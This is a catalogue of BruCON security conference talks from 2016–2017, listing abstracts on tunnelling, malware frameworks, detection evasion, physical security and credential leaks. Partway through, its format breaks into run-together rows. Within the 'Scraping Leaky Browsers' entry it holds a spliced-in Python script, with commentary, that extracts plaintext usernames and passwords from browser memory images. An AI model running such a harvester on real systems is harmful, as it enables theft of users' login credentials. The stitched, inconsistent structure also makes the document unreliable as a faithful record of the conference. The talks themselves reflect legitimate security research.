BruCON - Talk overview - 2009 - 2017
Columns: Type, Year, Name, Host, Abstract, Video, Slides

Type: Keynote
Year: 0x09
Name: How hackers changed the security industry and how we need to keep changing it
Host: Chris Wysopal
Abstract:
Before hackers got involved in cybersecurity the industry was focused on products and compliance. Security was security features: firewalls, authentication, encryption. Little thought was given to vulnerabilities that allowed the bypassing of those features. Hackers came along with the idea that you use offensive techniques to simulate how an attacker would discover vulnerabilities in a network, a system, or an application. Offensive skills have been on the rise ever since, and now the best way to secure something is to try and break it yourself before the attacker does. At the L0pht Chris lived the arc from the underground, to consumer advocates, to speaking at the U.S. Senate, to forming a 200-employee security consultancy, to schooling Microsoft and changing how people build software. Hackers needed to make trouble to effect positive change, and we need to keep making trouble or we will never get a more secure world.
Slides: BruCON 0x09 - How hackers changed the security industry and how we need to keep changing it - Chris Wysopal.pdf

Type: Talk
Year: 0x09
Name: See no evil, hear no evil: Hacking invisibly and silently with light and sound
Host: Matt Wixey
Abstract:
Traditional techniques for C2 channels, exfiltration, surveillance, and exploitation are often frustrated by the growing sophistication and prevalence of security protections, monitoring solutions, and controls. Whilst all is definitely not lost from an attacker's perspective (we constantly see examples of attackers creatively bypassing such protections), it is always beneficial to have more weapons in one's arsenal, particularly when coming up against heavily-defended networks and highly-secured environments.

This talk demonstrates a number of techniques and attacks which leverage light and/or sound, using off-the-shelf hardware. It covers everything from C2 channels and exfiltration using light and near-ultrasonic sound, to disabling and disrupting motion detectors; from laser microphones, to catapulting drones into the stratosphere (or the ceiling if you're risk-averse); from trolling friends, to jamming speech and demotivating malware analysts. This talk not only provides attendees with a new suite of techniques and methodologies to consider when coming up against a well-defended target, but also demonstrates, in a hopefully fun and practical way, how these techniques work, their advantages, disadvantages, and possible future developments. It also gives details of real case studies where some of these techniques have been used, and provides defenders with realistic methods for the mitigation of these attacks.

Finally, the talk covers some ideas for future research in this area.
Slides: BruCON 0x09 - See no evil, hear no evil Hacking invisibly and silently with light and sound - Matt Wixey.pdf

Type: Talk
Year: 0x09
Name: XFLTReaT: a new dimension in tunnelling
Host: Balazs Bucsay
Abstract:
This presentation will sum up how to do tunnelling with different protocols and will detail different perspectives. For example, companies are fighting hard to block exfiltration from their network: they use http(s) proxies, DLP and IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. Mitigation and bypass techniques will be shown to you during this presentation, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.

Our new tool XFLTReaT is an open-source tunnelling framework that handles all the boring stuff and gives users the capability to take care of only the things that matter. It provides significant improvements over existing tools. From now on there is no need to write a new tunnel for each and every protocol or to deal with interfaces and routing. Any protocol can be converted to a module, which works in a plug-and-play fashion; authentication and encryption can be configured and customised on all traffic, and it is also worth mentioning that the framework was designed to be easy to configure, use and develop. In case there is a need to send packets over ICMP type 0 or HTTPS TLS v1.2 with a special header, then this can be done in a matter of minutes, instead of developing a new tool from scratch. The potential use (or abuse) cases are plentiful, such as bypassing network restrictions of an ISP or the proxy of a workplace, or obtaining Internet connectivity by bypassing captive portals in the middle of the Atlantic Ocean or at an altitude of 33000ft on an airplane.

This framework is not just a tool; it unites different technologies in the field of tunnelling. While in the past we needed to use different tunnels and VPNs for different protocols, like OpenVPN for TCP and UDP, ptunnel for ICMP or iodined for DNS tunnelling, that changes now. After taking a look at these tools it was easy to see some commonality: all of them are doing the same things, only the means of communication are different. We simplified the whole process and created a framework that is responsible for everything but the communication itself; we rethought the old way of tunnelling and tried to give something new to the community. After the initial setup the framework takes care of everything. With the check functionality we can even find out which module can be used on the network; there is no need for any low-level packet fu and hassle. I guarantee that you won’t be disappointed with the tool and the talk; actually you will be richer with an open-source tool.

Type: Talk
Year: 0x09
Name: Knock Knock... Who's there? admin admin and get in! An overview of the CMS brute-forcing malware landscape.
Host: Anna Shirokova and Veronica Valeros
Abstract:
With more than 18M websites on the internet using WordPress [1] and hundreds of known vulnerabilities reported [2], this and other well-known Content Management Systems (CMS) have been systematically attacked for the past years by different threat actors looking for disposable infrastructure for their attacks.

Brute-forcing is one of the most common types of attacks against CMS. The main goal of this attack is pretty straightforward: to obtain a valid username and password and get access to the CMS administration panel. Attackers take advantage of the fact that still, in most cases, the passwords chosen for CMSs are very weak: admin, 123456, qwerty, etc. Successfully brute-forced websites are commonly used for hosting C&Cs, scams, and drive-by attacks to spread malware, or even for selling on the black market to interested parties.

The goal of this presentation is threefold: first, to outline different malware and botnets with CMS brute-forcing capabilities; second, to provide a comparison of the most prominent brute-forcing botnets with a focus on their technical capabilities; third, to present an in-depth analysis of a real-life distributed brute-force attack on a popular CMS platform performed by a botnet known as Sathurbot.

While the trojan Sathurbot first appeared in 2013 [3], it is still active and affecting hundreds of users. To this date, the trojan has 4 known modules: backdoor, downloader, web crawler, and brute-forcing. The downloader module allows the trojan to deliver additional malware to the infected machine such as Boaxxe, Kovter, and Fleercivet. The web crawler module allows the trojan to search in different search engines for websites using the WordPress CMS. The brute-forcing module is what the trojan uses to attempt to log in to the WordPress admin panels with different credentials. The case study is focused on the web crawling and brute-forcing modules, with specific insights obtained from a real-life infection. It will provide insights into the infrastructure, target selection, aggressiveness, and an analysis of its success from our observation.

As a final contribution, we will present some detection methods that can be used to identify CMS brute-forcing attacks.

References:
[1] Built With. (2017, April). WordPress Usage Statistics. Retrieved from https://trends.builtwith.com/cms/WordPress
[2] CVE Details. (2017, April). WordPress Security Vulnerabilities. Retrieved from https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/
[3] Krebs On Security. (2013, April). Brute Force Attacks Build WordPress Botnet. Retrieved from https://krebsonsecurity.com/2013/04/brute-force-attacks-build-wordpress-botnet/
Video: https://www.youtube.com/watch?v=q0GlAWbMeMo
Slides: BruCON 0x09 - Knock Knock... Who's there admin admin and get in! An overview of the CMS brute-forcing malware landscape - Anna Shirokova and Veronica Valeros.pdf

Type: Talk
Year: 0x09
Name: From Weakest Link to Retaliation Weapon: Building Efficient Anti-Social Engineering Awareness Program
Host: Volodymyr Styran
Abstract:
Like many infosec practitioners, early in my career I tended to disregard security awareness. People can't change, I thought, and the evidence was there. No matter what we, as the security community, did to make our less savvy colleagues avoid social engineering threats, it seemed that it didn't work. But it turned out that we just did the wrong things.

Much later, when I had become more familiar with the industry as a whole and the agendas that drive its players, I realized that information security is simply not the field where the answers to the questions of human nature could be found. All the infosec industry could offer was moving "the user" as far as possible from the responsibility for their actions, normally by placing a bunch of intrusive software on their devices and some blinking boxes between them and the Internet.

But wait, I pondered, if the human being is so unreliable and irresponsible, how did it happen that humanity survived the natural threats and developed into the species that dominates planet Earth? Could we draw analogies between the threats in the real, kinetic world and the "cyber space"? Could we then use the strategies that helped us fight (or rather flee) a bear… or a tiger… to survive this new jungle out there? It turns out we could.

During the last two years I've developed an efficient program that leads to a significant increase in user resilience to modern cyber threats that employ social engineering principles and techniques. The approach it takes is backed by social psychology and behavioral science research results, as well as the track record of its successful application to high-profile companies here in Ukraine, which face threats that are slightly unusual for most businesses abroad.

During the talk I will let you know how it works, why it works, and how you can make it work for your own or any other company.
Video: https://www.youtube.com/watch?v=40tUy6TNXM8
Slides: BruCON 0x09 - From Weakest Link to Retaliation Weapon Building Efficient Anti-Social Engineering Awareness Program - Volodymyr Styran.pdf

Type: Talk
Year: 0x09
Name: DYODE (Do Your Own Dyode)
Host: Arnaud Soullié
Abstract:
DYODE (Do Your Own Dyode) is a low-cost, DIY data diode aimed at securing Industrial Control Systems. While data diodes have been used for a long time on classified networks, the high cost and complexity of implementation have kept them away from a lot of valid use cases on industrial control systems. During our assignments, we encountered many situations in which time or availability constraints were not really high (but the security risk was) and a commercial data diode was way too costly.

We developed a working data diode using standard components and open source libraries. We want to prove with this project that it is possible to produce a simple, working, ICS-oriented data diode for less than $200. The principles of using COTS components to make a data diode are not brand new, but we aim at providing a packaged software solution to ease the creation process, with a specific focus on ICS.

Our diode can be used for file transfer, Modbus data transfer as well as screen sharing for remote debugging.

We will demo v2 of the DYODE, a diode based on a serial connection and an optocoupler, that only allows very low-speed exchanges (sufficient for Modbus) for an even cheaper cost (around $50).

Type: Talk
Year: 0x09
Name: Weaponizing the BBC Micro:Bit
Host: Damien Cauquil
Abstract:
In 2015, the BBC-sponsored Micro:Bit was launched and offered to one million students in the United Kingdom to teach them how to code. This device is affordable, has a lot of features and can be programmed in Python rather than C++ like the Arduino. When we discovered this initiative in 2016, we quickly thought it was possible to turn this tiny device into some kind of super-duper portable wireless attack tool, as it is based on a well-known 2.4GHz RF chip produced by Nordic Semiconductor.

It took us a few months to hack into the Micro:Bit firmware and turn it into a powerful wireless attack tool able to sniff keystrokes from wireless keyboards or to hijack and take complete control of quadcopters during flight. We also developed many tools allowing security researchers to interact with proprietary 2.4GHz protocols, such as an improved sniffer inspired by the mousejack tools designed by Bastille. The source code of our custom firmware and related tools is open source.

The Micro:Bit will become a nifty platform to create portable RF attack tools and ease the life of security researchers dealing with 2.4GHz protocols!

Type: Talk
Year: 0x09
Name: Secure channels: Building real world crypto systems
Host: Sander Demeester
Abstract:
Secure communication is one of the most common and most important real-world applications of cryptography today. But despite being one of the most important requirements of modern communication systems, people still keep getting this wrong, and it’s not fully clear why that is. In this presentation we are going to explore the cryptography that is involved in building secure channels (the theory and the practice). We are going to look at different secure channel concepts:
- Authenticated key establishment protocol;
- Key derivation phases;
- Protecting data using the derived key (typically using authenticated encryption).

This is followed by an in-depth look at the typical properties that we require of such channels and the specific cryptographic constructions that accomplish these properties. We will look at the following properties:
- Data confidentiality;
- Data integrity;
- Authenticity of the messages.

We will explain some of the most famous security bugs in TLS and SSH and why they came to be by exploring the “cryptographic doom principle” and some of the proposed fixes. In the second part of this presentation we are going to look at some recent efforts in secure channel implementations (SSH and TLS 1.3), and what the proposed fixes entailed.

Attendees will learn what a cryptographic secure channel is and what typical cryptographic constructions are involved in creating such a channel.
Video: https://www.youtube.com/watch?v=1ypA7r6CDZ0
Slides: BruCON 0x09 - Secure channels Building real world crypto systems - Sander Demeester.pdf

Type: Talk
Year: 0x09
Name: MEATPISTOL, A Modular Malware Implant Framework
Host: Josh Schwartz and John Cramb
Abstract:
Attention Red Teamers, Penetration Testers, and Offensive Security Operators, isn’t the overhead of fighting attribution, spinning up infrastructure, and having to constantly re-write malware an absolute pain and timesink!?! It was for us too, so we’re fixing that for good (well, maybe for evil). Join us for the public unveiling and open source release of our latest project, MEATPISTOL, a modular malware framework for implant creation, infrastructure automation, and shell interaction.

This framework is designed to meet the needs of offensive security operators requiring rapid configuration and creation of long-lived malware implants and associated command and control infrastructure. Say goodbye to writing janky one-off malware and say hello to building upon a framework designed to support efficient yoloscoped adversarial campaigns against capable targets.

Type: Talk
Year: 0x09
Name: Open Source Security Orchestration
Host: Gregory Pickett
Abstract:
My original question was “How do I share a Fail2ban jail?” But there are many other questions, aren’t there? How do we get to threats in time? How do we make sure that the evidence that we need gets captured or that the threat is stopped before it is too late? How do we do all this with a limited staff? We only have so many people. The answer to that is orchestration. Of course, the vendors can offer you something. As long as you want to pay lots of money and set up a complicated product, they’ve got you covered. Seriously! I just want these two boxes talking. If this happens, I want this to happen. Can we just do that without some major operation? Yes. It turns out that we can.

We’ll start with the Adaptive Network Protocol (ANP), which was developed so that nodes can share event information with each other. Install an ANP agent, peer it with as many systems as you want so that they can begin sharing, and then add an interface for every action that you would like a system to take when it sees a particular event. It is that easy.

In this session, we’ll show you how ANP works, how to install it, and cover all the use cases, from generating your own Threat Intelligence feed, to sharing Fail2ban jails across clouds, to automatically NATing threats to honeypots, and many more. To show you how it works, I will even demo some of these scenarios. What's more, you can take ANP home with you so that you too can use it to automate your network defenses. Because when it comes to defending your network, responding quickly can make all the difference, and with ANP you can do that.
Video: https://www.youtube.com/watch?v=EnQ6rA6XEIU
Slides: BruCON 0x09 - Open Source Security Orchestration - Gregory Pickett.pdf

Type: Talk
Year: 0x09
Name: Detecting malware even when it is encrypted - Machine Learning for network HTTPS analysis
Host: František Střasák and Sebastian Garcia
Abstract:
With the increasing amount of malware HTTPS traffic, it is a challenge to discover new features and methods to detect malware without decrypting the traffic. A detection method that does not need to decrypt the traffic is cheaper (because no traffic interceptor is needed), faster and private, respecting the original idea of HTTPS. Our research goal is to detect malware HTTPS connections using data from Bro IDS logs [1], without needing to decrypt the traffic.

We created and extracted our features from the data logs that the Bro IDS is able to generate from a pcap file. Bro offers information about flows, SSL handshakes and X.509 certificates. These three types of data give us enough information to create powerful features and machine learning algorithms to detect malicious HTTPS traffic with good accuracy.

Our machine learning algorithm uses 30 different features. These features are divided into features for flows, features for SSL handshakes and features for X.509 certificates. One of our main contributions is that our data model is based on connection 4-tuples. A connection 4-tuple aggregates the group of flows which share the same SrcIP, DstIP, DstPort, and protocol. Therefore, each connection summarizes the behavior of the malware while connecting to the same C&C server. Such aggregation proved paramount for the success of our method.

A core part of our research was the production and selection of correct datasets. We used 13 datasets from the CTU-13 malware dataset [2], 55 malware datasets from the Stratosphere Malware Capture Facility Project (done by Maria Jose Erquiaga) [3], and we produced 20 of our own normal datasets. Each dataset was processed to extract the Bro files from the original pcap files. Afterwards, each dataset was labeled using our expert knowledge. The amount of malware and normal traffic in our entire dataset is balanced.

Our detection method consisted of using and comparing several machine learning algorithms to learn how normal HTTPS traffic differs from malware HTTPS traffic based on our behavioral features. Our results show that malware HTTPS behaviour is distinct from normal HTTPS behaviour and that our methods are able to detect malware with good accuracy without decrypting the traffic.

References:
[1] https://www.bro.org/
[2] https://stratosphereips.org/category/dataset.html
[3] https://mcfp.felk.cvut.cz/publicDatasets/
Video: https://www.youtube.com/watch?v=jlEbsXTKGcQ
Slides: BruCON 0x09 - Detecting malware even when it is encrypted - Machine Learning for network HTTPS analysis -František Střasák and Sebastian Garcia.pdf

Type: Talk
Year: 0x09
Name: Evading Microsoft ATA for Active Directory Domination
Host: Nikhil Mittal
Abstract:
Microsoft Advanced Threat Analytics (ATA) is a defense platform which reads information from multiple sources, like traffic for certain protocols to the Domain Controller, Windows Event Logs and SIEM events. The information thus collected is used to detect Reconnaissance, Credential replay, Lateral movement, Persistence attacks etc. Well-known attacks like Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Golden Ticket, Directory services replication, Brute-force, Skeleton key etc. can be detected using ATA. Whenever communication to a Domain Controller is done using protocols like Kerberos, NTLM, RPC, DNS, LDAP etc., ATA will parse that traffic to gather information about not only possible attacks but user behavior as well. It slowly builds an organizational graph and can detect deviations from normal behavior.

Is it possible to evade this solid detection mechanism? What are the threats which ATA misses by design? How can Red Teamers and Penetration Testers modify their attack chain and methodology to bypass ATA? Can we still have domain dominance?
Video: https://www.youtube.com/watch?v=5gu4r-IDDwU
Slides: BruCON 0x09 - Evading Microsoft ATA for Active Directory Domination - Nikhil Mittal.pdf

Type: Talk
Year: 0x09
Name: Browser Exploits? Grab them by the collar!
Host: Debasish Mandal
Abstract:
APT has become a hot topic in enterprise IT today. One of the pieces of software that we see becoming a victim of APT attacks most often is the web browser, and its attack surface is becoming bigger and bigger every day.

TCP Live Stream Injection (https://en.wikipedia.org/wiki/Packet_injection) is a technique that we have seen being abused by various Internet Service Providers and router vendors for decades. We have seen in the past that, using this technique, ISPs and router vendors intercept HTTP traffic and silently inject arbitrary data into HTTP responses. This is usually done by injecting arbitrary JavaScript code into the actual HTTP response body in real time. When the injected JavaScript code reaches the client browser it performs various operations such as loading advertisements, information gathering etc.

This paper presents a generic browser exploit detection technique that uses the same Live Network Stream Code Injection technique to reliably catch browser exploits. The detection system can be considered completely agentless and capable of detecting various techniques used in modern browser exploitation. Unlike other Host Based Intrusion Prevention Systems, no OS API hooking, DLL injection or code injection in the browser process is required to generically detect and block browser exploits.
Slides: BruCON 0x09 - Browser Exploits Grab them by the collar! - Debasish Mandal.pdf

Type: Keynote
Year: 0x09
Name: The cyber short. A market solution for product safety and corporate governance.
Host: Justine Bone
Abstract:
The Bug Short: What I learned on the way to Wall Street. Justine Bone presents the world's first ever cyber security-backed short position.

As CEO of MedSec, Justine and her team successfully utilized cybersecurity research to impact company performance. Working in partnership with the Muddy Waters investment fund, Justine changed the calculus of how security experts can invest, conduct, and deliver research. Justine describes the factors, gotchas, and preparation required to embark on and execute such a project, enacting a new way to monetize vulnerabilities and address the dysfunctional market around product security.
Video: https://www.youtube.com/watch?v=LPhxn8pJFyU
Slides: BruCON 0x09 - The cyber short. A market solution for product safety and corporate governance. - Justine Bone.pdf

Type: Talk
Year: 0x08
Name: Building A Successful Internal Adversarial Simulation Team
Host: Chris Gates and Chris Nickerson
Abstract:
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable processes. It is extremely rare that a vulnerability causes a direct risk to an environment; it is usually what the attacker DOES with the access gained that matters. In this talk we will discuss the way that internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the defensive teams to measure the environment's resistance to the attacks. We will demonstrate attacks, capabilities, TTP tracking, trending, positive metrics, hunt integration and, most of all, we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team, sparring and training every day to be ready for the fight when it comes to us.
Video: https://www.youtube.com/watch?v=Q5Fu6AvXi_A
Slides: BruCON 0x08 - Adversarial Simulation Team.pptx

Type: Talk
Year: 0x08
Name: What Does The Perfect Door Or Padlock Look Like?
Host: Deviant Ollam
Abstract:
You have spent lots of budget on a high-grade, pick-resistant lock for your door. Your vendor has assured you how it will resist attack and how difficult it would be for someone to copy your key. You’ve carefully chosen robust and heavy-duty padlocks to secure your critical infrastructure and grounds. Your Plant Ops people feel assured that outsiders wouldn’t dare try to pick or smash such a lock open. Maybe they’re right. But... the bulk of real-world attacks that both penetration testers and also criminals attempt against doors and padlocks have little or nothing to do with the locking mechanism itself! This talk will be a hard-hitting exploration (full of photo and video examples) of the ways in which your doors and padlocks, the most fundamental parts of your physical security, can possibly be thwarted by someone attempting illicit entry via means that don’t involve intricate pick tools or finesse techniques. Bypassing and quick entry are often possible on our physical security hardware due to systemic and simple vulns that we have not yet eradicated. The showcasing of these scary problems will be immediately followed by bulleted lists of simple solutions that are instantly implementable and usually very much within budget. You, too, can have near-perfect doors or padlocks... if you’re willing to learn and understand the problems that all such hardware tends to have out of the box.
Video: https://www.youtube.com/watch?v=4skSBwBBI-s
Slides: BruCON 0x08 - Perfect Doors and Padlocks.pdf

Type: Keynote
Year: 0x08
Name: Keynote - Inventing Defense
Host: Allison Miller
Abstract: <<MISSING INFO>>
Video: https://www.youtube.com/watch?v=8Uud4ZtbKyI
Slides: <<MISSING>>

Type: Talk
Year: 0x08
Name: Decepticon
Host: R. Nandedkar, Amrita Iyer, Krishnakant Patil
Abstract:
“Decepticon” is an attempt to write a marginally intelligent bot capable of operating on IEEE 802.11 standards, which will launch as an Evil Twin Attack and will operate in the mode of execution with a lot of added smartness/intelligence. The brief course of the talk is: the Evil Twin Attack and its evolution from the normal evil twin attack to Decepticon, the need for evolution of the Evil Twin Attack, drawbacks of Evil Twin and enhancements considered so far in Decepticon, the challenges we faced and our ways to solve some of them.
Video: https://www.youtube.com/watch?v=e76Y2qVpFzA
Slides: BruCON 0x08 - Decepticon.pptx

Type: Talk
Year: 0x08
Name: Anti-Forensics AF
Host: Dual Core
Abstract:
This presentation is the screaming goat anti-forensics version of those ‘Stupid Pet Tricks’ segments on late night US talk shows. Nothing ground-breaking here, but we’ll cover new and trolly techniques that forensic investigators haven’t considered or encountered. Intended targets cover a variety of OS platforms.
Video: https://www.youtube.com/watch?v=8q_1VF7jJ3g
Slides: <<MISSING>>

Type: Talk
Year: 0x08
Name: Security Through Design
Host: Jelle Niemantsverdriet
Abstract:
In this session we will explore why certain devices, pieces of software or companies lead us to utter frustration while others consistently delight us and put a smile on our face. With these insights in mind, we will explore how we typically create our security processes, teams and solutions. All too often we create something without properly understanding what our colleagues or customers are trying to achieve, only to bombard them with awareness training and policies because they “just don’t get it” and because “humans are the weakest link”. We will look at user-centered design methods and concepts from other disciplines like economics, psychology or marketing that can help us to build security in a truly usable way, not just in our tools but also in the way we set up our teams, the way we communicate and the way we align incentives. Every interaction with security is an opportunity to improve convenience and bring a smile to somebody’s face. By understanding the impact of design, we can do a lot to improve corporate productivity and security itself.
Video: https://www.youtube.com/watch?v=5ODAhA-r3xU
Slides: BruCON 0x08 - Security Through Design.pdf

Type: Talk
Year: 0x08
Name: Esoteric Web Application Vulnerabilities
Host: Andres Riancho
Abstract:
This talk will show esoteric web application vulnerabilities in detail. These vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items from merchants using PayPal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let’s explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; PayPal’s double spend and Rails’ MessageVerifier remote code execution.

Topics we’ll be covering:
* Aggressive input decoding
* Nil, NULL and password reset tokens
* Host header manipulation
* (quick) X-Forwarded-For: 127.0.0.1
* ActiveSupport::MessageVerifier Remote Code Execution
* Insecure PayPal IPN implementations
Video: https://www.youtube.com/watch?v=V8_Ozpl_eyo
Slides: <<MISSING>>
24
Talk
0x08
Scraping Leaky Browsers for fun and PasswordsStefaan Truijen - Adrian TomaOne of the most commonly used applications on desktop systems are web browsers. We identified that the latest versions of Microsoft Internet Explorer Edge, Google Chrome and Mozilla Firefox all contain vulnerabilities with regards to memory management of sensitive data. Concretely, they keep clear-text credentials in memory long after they have been entered and the designated tab is closed, allowing an adversary to recover this sensitive data as long as the web browser is running. This could prove very useful in certain forensic investigations, or be abused by an attacker to stealthily harvest website credentials without the need to install additional malware (e.g. a keylogger). As a Proof-of-Concept for the vendors, we have implemented a Volatility Framework Plugin that allows to harvest website credentials from a memory dump. This plugin will be open-sourced after this talk. Additionally, we will share the response of the three vendors on our PoC. The idea of the research came from NVISO, a young Belgian Cyber Security firm. KULeuven student Stefaan Truijen performed his Computer Science Master Thesis on the subject and compared the susceptibility of each browser under certain conditions (e.g. influence of private browsing mode, ...). HEB ESI student Adrian Toma developed the Volatility Framework plugin during the internship for his Second Bachelor Degree in Networks and System Security at NVISO.
https://www.youtube.com/watch?v=RInjKewZ6Q0BruCON 0x08 - Scraping Leaky Browsers.pptx
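The abstract describes harvesting credentials that a browser leaves in memory after the login form has been submitted. The block below is an added example, not the NVISO plugin and not tied to any Volatility API: it scans a constructed stand-in for a process memory image for two common leak shapes, a URL-encoded login form body and a JSON login payload, and it does so in both 8-bit and UTF-16LE form because browser JavaScript engines keep strings as UTF-16. The field-name patterns, the sample dump and the assumption that the password field directly follows the username field are all constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# URL-encoded login form body: a username-ish field directly followed by a
# password-ish field (the usual order in browser form submissions).
FORM_RE = re.compile(
    rb"(?<![A-Za-z0-9_])(?:user(?:name)?|login|email)=(?P<user>[^&\s\x00]{1,64})"
    rb"&(?:pass(?:word|wd)?|pwd)=(?P<pw>[^&\s\x00]{1,128})",
    re.IGNORECASE,
)
# JSON login payload as sent by XHR/fetch based login pages.
JSON_RE = re.compile(
    rb'"(?:user(?:name)?|login|email)"\s*:\s*"(?P<user>[^"\x00]{1,64})"\s*,\s*'
    rb'"(?:pass(?:word|wd)?|pwd)"\s*:\s*"(?P<pw>[^"\x00]{1,128})"',
    re.IGNORECASE,
)

# Constructed stand-in for a browser process memory image: HTTP debris,
# a form POST, a JSON login, and one UTF-16LE string as a JS engine keeps it.
DUMP = (
    b"\x00" * 16
    + b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"
    + bytes(range(256))
    + b"POST /login HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    + b"username=alice&password=S3cret%21&remember=1"
    + b"\x00" * 8
    + b'{"username":"carol","password":"p@ss word","csrf":"f00"}'
    + b"\xff" * 7
    + "login=bob&passwd=hunter2".encode("utf-16-le")
    + b"\x00" * 8
)


def _scan_8bit(buf, encoding, base_offset, stride, hits):
    for kind, rx, decode in (("form", FORM_RE, unquote_plus), ("json", JSON_RE, str)):
        for m in rx.finditer(buf):
            hits.append({
                "offset": base_offset + m.start() * stride,
                "encoding": encoding,
                "kind": kind,
                "user": decode(m.group("user").decode("latin-1")),
                "password": decode(m.group("pw").decode("latin-1")),
            })


def scan_for_credentials(dump):
    """Return credential candidates found in a raw memory image."""
    hits = []
    _scan_8bit(dump, "ascii", 0, 1, hits)
    # Narrow the UTF-16LE view at both byte alignments: every code unit
    # collapses to one latin-1 byte ('?' for anything outside latin-1), so a
    # match at index i in the narrowed text starts near byte align + 2*i
    # (surrogate pairs shift that slightly).
    for align in (0, 1):
        narrowed = (
            dump[align:]
            .decode("utf-16-le", errors="replace")
            .encode("latin-1", errors="replace")
        )
        _scan_8bit(narrowed, "utf-16le", align, 2, hits)
    # De-duplicate, keeping the lowest offset per (encoding, user, password).
    seen = {}
    for h in sorted(hits, key=lambda h: h["offset"]):
        seen.setdefault((h["encoding"], h["user"], h["password"]), h)
    return list(seen.values())
```

Against a real image the same scan produces false positives from cached page source and from other processes' heap pages, so a production tool walks the process's own VAD/heap regions first and keeps the offset so each hit can be traced back to the page it came from.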
25
Keynote
0x08
Keynote - The Birth Of A DisciplineCorey Schou<<MISSING INFO>>https://www.youtube.com/watch?v=c1Q7yIPbJ1gBruCON 0x08 - The Birth of a Dicipline.pptx
26
Talk
0x08
Virtual Terminals, POS Security and becoming a billionaire overnightGrigorios FragkosVery few people use cash nowadays, as most use a debit or a credit card for their everyday needs. These transactions are performed through a Point-of-Interaction (POI) device or through a Virtual Terminal. Although payment terminals and virtual terminals make use of strong encryption and secure communication channels, the Point of Sale (POS) is still a target for criminals. The malware affecting point of sale systems seen in previous years demonstrates that criminals continually adapt to find ways to target card payment channels and keep the cycle going. Following on from the above, during this presentation a number of features (provided in POI devices as standard functionality) and the ability to misuse them during a transaction will be demonstrated. But the main focus will be on a Threat Modelling engagement undertaken against Virtual Terminals. More specifically, it will be demonstrated how POS malware can shift and, instead of targeting Card Holder Data (CHD), can target the actual money directly. In other words, I will show you how someone ended up with billions overnight, without having to steal a single card number.https://www.youtube.com/watch?v=OfZiZRtg3aQ<<MISSING>>
27
Talk
0x08
Hacking KPN: Lessons From The TrenchesJeremy Goldstein and Bouke Van LaethemThis talk will dive into three very different but equally interesting vulnerabilities, from the perspective of the in-house penetration testing done by the KPN (Royal Dutch Telecom) REDteam. We’ll not only go into the technical details of the vulnerabilities, but also share some tips and tricks on how we handle things like reporting, emotional counselling of internal stakeholders, browbeating vendors, etc. One vulnerability will demonstrate how pervasive the relatively recently announced Java Deserialisation vulnerability is. This will show an interesting example of where this vulnerability can show up and we’ll also release an update to a tool to detect this variation. We’ll guide you through the process of discovery and exploitation via an enterprise mobile app that was completely unexpected. Another vulnerability will show how simple it sometimes is to bypass or abuse “enterprise grade” solutions, in this case a security device for mobility management. Some of you might also be suffering through vulnerability disclosures and because pain shared is pain divided, we’ll go into how the KPN-CERT has tried to deal with this. A last vulnerability will demonstrate reverse engineering crypto out of an inhouse developed binary with a surprising KISS lesson learned after testing was done. You can expect useful tips and tricks for getting to the core of crypto functionality and then extracting it out for fun and profit (ok, maybe not profit).
https://www.youtube.com/watch?v=iTGvbi_wLE0BruCON 0x08 - Hacking KPN.pdf
28
Talk
0x08
New Adventures In Active Defense, Offensive…John StrandThe current threat landscape is shifting. Traditional defenses are failing us. We need to develop new strategies to defend ourselves. Even more importantly, we need to better understand who is attacking us and why. You may be able to immediately implement some of the measures we discuss in this course, while others may take a while. Either way, consider what we discuss as a collection of tools at your disposal when you need them to annoy attackers, determine who is attacking you, and, finally, attack the attackers.
https://www.youtube.com/watch?v=mjxE1ZzWA5ABruCON 0x08 - Active Defense.pptx
29
Talk
0x08
Hello To The Dark SideL. GrecsIn the aftermath of the fall of Evernote as an inexpensive threat intel platform, free and low cost solutions have awoken from its dismantled remains to give hope to defenders everywhere. This presentation continues on with grecs’ threat intel series of talks covering lessons learned from his Evernote experiment and pivots towards improved data structures and newly discovered enterprise-friendly intelligence platforms to support them. https://www.youtube.com/watch?v=Tb8ywVuhiiA<<MISSING>>
30
Talk
0x08
Smart Sheriff, Dumb Idea.Abraham Aranguren & Fabian FässlerWould you want to let your kids discover the darker corners of the internet without protection? Wouldn’t it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games? Worry no longer, the South Korean government has got you covered. Simply install the “Smart Sheriff” app on your and your kids’ phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring! Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn’t solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved in the first and, who would have guessed, second penetration test against the “Smart Sheriff” app will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then? We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder always delivers the best results. Right?
https://www.youtube.com/watch?v=AbGX67CuVBQBruCON 0x08 - Smart Sheriff Dumb Idea.pdf
31
Talk
0x08
